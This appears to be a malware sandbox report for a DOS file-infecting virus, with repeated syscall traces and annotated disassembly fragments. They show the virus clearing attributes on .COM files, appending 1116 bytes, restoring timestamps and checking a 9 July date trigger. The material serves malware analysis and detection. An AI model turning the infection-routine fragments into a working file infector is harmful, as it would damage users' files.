Sample viewer

vx.netlux.org/Virus.DOS.Nuke.Bob.1116


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:09.112884422Z 71 PC: 12b44 | Get current directory
2018-12-17T22:54:09.116745891Z 59 PC: 12b4f | Change current directory
2018-12-17T22:54:09.121160765Z 26 PC: 12c03 | Set disk transfer address
2018-12-17T22:54:09.122625085Z 78 PC: 12c11 | Find first file
2018-12-17T22:54:09.128030792Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:54:09.132169134Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:54:09.136153928Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
; Sandbox disassembly window for the "Get time" row (INT 21h AH=2Ch).
; It is a linear decode starting at the return address 0x12c82, not a trace of
; executed instructions; its first instruction, `add dl, dh`, is printed on the
; trace row just above, and the window stops mid-routine at `mov ah, 0x40`.
; AH=2Ch returns DH = seconds and DL = hundredths, so `add dl, dh` folds both
; into one clock-derived byte in DL.
0x12c84: je 0x12c7e                     ; sum was zero -> branch back to 0x12c7e (target not shown; presumably re-reads the clock)
0x12c86: mov si, 0x115                  ; fixed offset 0x115 ...
0x12c89: add si, word ptr [0x106]       ; ... plus the word at [0x106]; looks like a load-address delta -- confirm against the full listing
0x12c8d: mov byte ptr [si], dl          ; store the clock-derived byte; presumably a per-infection variable value, purpose not shown in this window
0x12c8f: mov ax, 0x4301                 ; INT 21h AX=4301h: set file attributes
0x12c92: xor cx, cx                     ; CX = 0 -> clears every attribute bit, read-only included
0x12c94: mov dx, si
0x12c96: add dx, 0xb1                   ; DS:DX = si + 0xb1, used as the filename pointer for the next two path-based calls
0x12c9a: int 0x21                       ; logged as "Get or set file attributes" at PC 12c9c
0x12c9c: mov ah, 0x3e                   ; INT 21h AH=3Eh: close the handle in BX (the earlier open used for the 8-byte read)
0x12c9e: int 0x21                       ; logged as "Close file" at PC 12ca0
0x12ca0: mov ax, 0x3d02                 ; INT 21h AX=3D02h: reopen the same name, access mode 2 = read/write
0x12ca3: int 0x21                       ; logged as "Open file" at PC 12ca5
0x12ca5: jb 0x12c5e                     ; CF set = open failed -> 0x12c5e (not shown)
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d                   ; DI = filename pointer + 0x5d
0x12cac: stosw word ptr es:[di], ax     ; save the returned handle (AX) at ES:[DI]
0x12cad: xchg ax, bx                    ; handle -> BX, where the handle-based INT 21h calls expect it
0x12cae: mov ah, 0x40                   ; AH=40h: write to file; the INT 21h itself lies past the end of this window
; Triage note: attribute clear -> close -> reopen read/write -> writes, with the
; timestamp and attribute calls that follow in the trace, is the file-modification
; sequence to match on when reviewing similar traces.
2018-12-17T22:54:09.138017958Z 67 PC: 12c9c | Get or set file attributes
2018-12-17T22:54:09.152539098Z 62 PC: 12ca0 | Close file
2018-12-17T22:54:09.154190318Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:54:09.162159776Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:09.167351115Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:54:09.169266995Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:54:09.171145268Z 66 PC: 12ce8 | Move file pointer
2018-12-17T22:54:09.173063663Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-17T22:54:09.182822766Z 87 PC: 12d01 | Get or set file date and time
2018-12-17T22:54:09.184645685Z 62 PC: 12d05 | Close file
2018-12-17T22:54:09.193280646Z 67 PC: 12d16 | Get or set file attributes
2018-12-17T22:54:09.203528096Z 79 PC: 12c25 | Find next file
2018-12-17T22:54:09.206540276Z 61 PC: 12c3d | Open file (Filename = 'PRINT.COM')
2018-12-17T22:54:09.214591095Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:54:09.221688046Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-17T22:54:09.224389629Z 67 PC: 12c9c | Get or set file attributes
2018-12-17T22:54:09.236464219Z 62 PC: 12ca0 | Close file
2018-12-17T22:54:09.238218697Z 61 PC: 12ca5 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:54:09.244720394Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:09.248676837Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:54:09.251240196Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:54:09.25377647Z 66 PC: 12ce8 | Move file pointer
2018-12-17T22:54:09.256745308Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-17T22:54:09.271834452Z 87 PC: 12d01 | Get or set file date and time
2018-12-17T22:54:09.273348275Z 62 PC: 12d05 | Close file
2018-12-17T22:54:09.280942434Z 67 PC: 12d16 | Get or set file attributes
2018-12-17T22:54:09.291275235Z 79 PC: 12c25 | Find next file
2018-12-17T22:54:09.294184194Z 61 PC: 12c3d | Open file (Filename = 'HELLO.COM')
2018-12-17T22:54:09.301494587Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:54:09.309218584Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-17T22:54:09.311578597Z 67 PC: 12c9c | Get or set file attributes
2018-12-17T22:54:09.321704807Z 62 PC: 12ca0 | Close file
2018-12-17T22:54:09.32489925Z 61 PC: 12ca5 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:54:09.331728127Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:09.334775344Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:54:09.338677191Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:54:09.341943123Z 66 PC: 12ce8 | Move file pointer
2018-12-17T22:54:09.34413094Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-17T22:54:09.354055537Z 87 PC: 12d01 | Get or set file date and time
2018-12-17T22:54:09.356076635Z 62 PC: 12d05 | Close file
2018-12-17T22:54:09.36398075Z 67 PC: 12d16 | Get or set file attributes
2018-12-17T22:54:09.37432014Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
; Sandbox disassembly window for the "Get date" row (INT 21h AH=2Ah).
; It is a linear decode starting at the return address 0x12b6a; the first
; instruction, `cmp dx, 0x709`, is printed on the trace row just above.
; AH=2Ah returns DH = month and DL = day, so DX == 0x0709 means 9 July.
; Coverage caveat: the run record on this page gives the emulated clock as
; Day 1 / Month 1 / Year 1980, so the equal branch is not taken here and whatever
; sits at 0x12d1c is not exercised by this trace. A clean-looking run on any other
; date says nothing about that branch.
0x12b6e: je 0x12b73                     ; date matches -> trampoline below
0x12b70: jmp 0x12d88                    ; no match -> 0x12d88; the next logged calls (PC 12d93, 12d9a) are in that region
0x12b73: jmp 0x12d1c                    ; date-triggered path (body not shown on this page)
; NOTE(review): everything from 0x12b76 to 0x12b84 follows two unconditional
; jumps and decodes implausibly (port I/O, odd operands). The encodings imply
; the decoder is out of step: 00 55 89 / E5 83 / EC / 2C 56 re-read from 0x12b7f
; is 55 | 89 E5 | 83 EC 2C | 56 = push bp; mov bp, sp; sub sp, 0x2c; push si.
; Treat 0x12b76-0x12b7e as data and 0x12b7f as a routine entry -- confirm with a
; recursive-descent disassembly before relying on these lines.
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8                    ; decoder is back in step here; jumps forward over the code below
0x12b89: mov ah, 0x1a                   ; INT 21h AH=1Ah: set disk transfer address
0x12b8b: lea dx, word ptr [bp - 0x2c]   ; DTA = local buffer at bp-0x2c (matches the 0x2c-byte frame noted above)
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e                   ; INT 21h AH=4Eh: find first matching file
0x12b92: mov cx, 0x10                   ; attribute mask 0x10 = directory entries included in the search
0x12b95: mov dx, 0x19f                  ; search-pattern offset 0x19f ...
0x12b98: add dx, word ptr [0x106]       ; ... plus the same [0x106] adjustment; the INT 21h lies past the end of this window
2018-12-17T22:54:09.377964762Z 59 PC: 12d93 | Change current directory
2018-12-17T22:54:09.382190332Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:42.325634871Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:42.329775042Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:42.334083215Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:42.335374017Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:42.342486194Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.349246334Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:42.355910084Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:42.358255883Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:42.375229496Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:42.37706598Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.38387717Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:42.387834403Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:42.391626503Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:42.394975786Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:42.399378876Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:42.412217931Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:42.417990095Z 62 PC: 12d05 | Close file
2018-12-25T12:30:42.43104494Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:42.440785004Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:42.443375888Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:42.450887996Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:42.457935086Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:42.460358908Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:42.470809198Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:42.47335225Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:42.48003498Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:42.482929451Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:42.48644562Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:42.489066457Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:42.491050546Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:42.500736459Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:42.502712342Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:42.510721289Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:42.521361968Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:42.524420109Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:42.531101709Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:42.539075596Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:42.541821116Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:42.55204418Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:42.554602974Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:42.561258511Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:42.563979243Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:42.566705723Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:42.570075735Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:42.572258531Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:42.581351259Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:42.583650872Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:42.593165938Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:42.60357568Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:42.607056116Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:42.611139975Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:42.40850405Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:42.412194963Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:42.417011986Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:42.418146932Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:42.42427891Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.431275689Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:42.437723805Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:42.440066218Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:42.45646645Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:42.458441869Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.465276675Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:42.469069937Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:42.471557585Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:42.474952116Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:42.477772548Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:42.486871881Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:42.488237496Z 62 PC: 12d05 | Close file
2018-12-25T12:30:42.496587302Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:42.506329601Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:42.509121419Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:42.515945521Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:42.535775896Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:42.537505019Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:42.545788589Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:42.54870152Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:42.557237667Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:42.560077064Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:42.563406667Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:42.566281251Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:42.5683987Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:42.578336025Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:42.579857879Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:42.587398932Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:42.597833536Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:42.600526216Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:42.606972459Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:42.61412943Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:42.616345644Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:42.626471608Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:42.628910238Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:42.635586955Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:42.638512534Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:42.642002367Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:42.645132316Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:42.646840207Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:42.656433238Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:42.658393408Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:42.666125041Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:42.676308918Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:42.678867196Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:42.683538792Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:42.448418584Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:42.451870816Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:42.456059041Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:42.457432485Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:42.464531153Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.472621427Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:42.479398797Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:42.485430256Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:42.505687349Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:42.508049539Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.523487182Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:42.526421737Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:42.529154715Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:42.532868341Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:42.534940212Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:42.544381883Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:42.546246515Z 62 PC: 12d05 | Close file
2018-12-25T12:30:42.554049419Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:42.563815174Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:42.566636003Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:42.574269363Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:42.580722144Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:42.587048729Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:42.597784389Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:42.60174818Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:42.613360094Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:42.620772202Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:42.627660876Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:42.630370368Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:42.634874421Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:42.644361324Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:42.646162089Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:42.65482647Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:42.664666175Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:42.667292434Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:42.675523778Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:42.682474844Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:42.684960388Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:42.695002193Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:42.698022519Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:42.704742472Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:42.707747264Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:42.711143823Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:42.713932762Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:42.715997467Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:42.725385019Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:42.727081549Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:42.739986494Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:42.751027127Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:42.753086943Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:42.756895973Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:42.954142612Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:42.956889551Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:42.959857672Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:42.961623357Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:42.96946135Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.977071785Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:42.984553134Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:42.987896435Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:43.009429648Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:43.01154557Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:43.020252256Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:43.027815974Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:43.030760357Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:43.033824651Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:43.036289728Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:43.046204893Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:43.047676699Z 62 PC: 12d05 | Close file
2018-12-25T12:30:43.056850662Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:43.068858824Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:43.071970591Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:43.088585047Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:43.096273942Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:43.098820118Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:43.111405337Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:43.113405249Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:43.120876068Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:43.124299281Z 64 PC: 12cca | Write file or device (See above)
